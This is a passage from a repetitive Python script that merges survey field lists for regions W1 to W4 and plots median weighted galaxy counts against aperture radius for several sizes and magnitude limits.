(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" 
in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size45_i%s.lst' % 
(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 
10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], 
unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.suptitle(r'%s weighted counts for W1-W4: median with radius' % str(sys.argv[1]), fontsize=10, y=0.998)\n\n\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n#s = \"50: %.3f,%.3f,%.3f\" % (np.median(q_W1_50_120),np.average(q_W1_50_120),np.median(q_W1_50_120)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.ylabel('$\\zeta_{gal}$', fontsize=15)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 
1\n\ncols=3\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 
usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nx = linspace(0,2,500)\n\n\n\nplt.subplot(452)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], 
[np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\n\ncols=5\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = 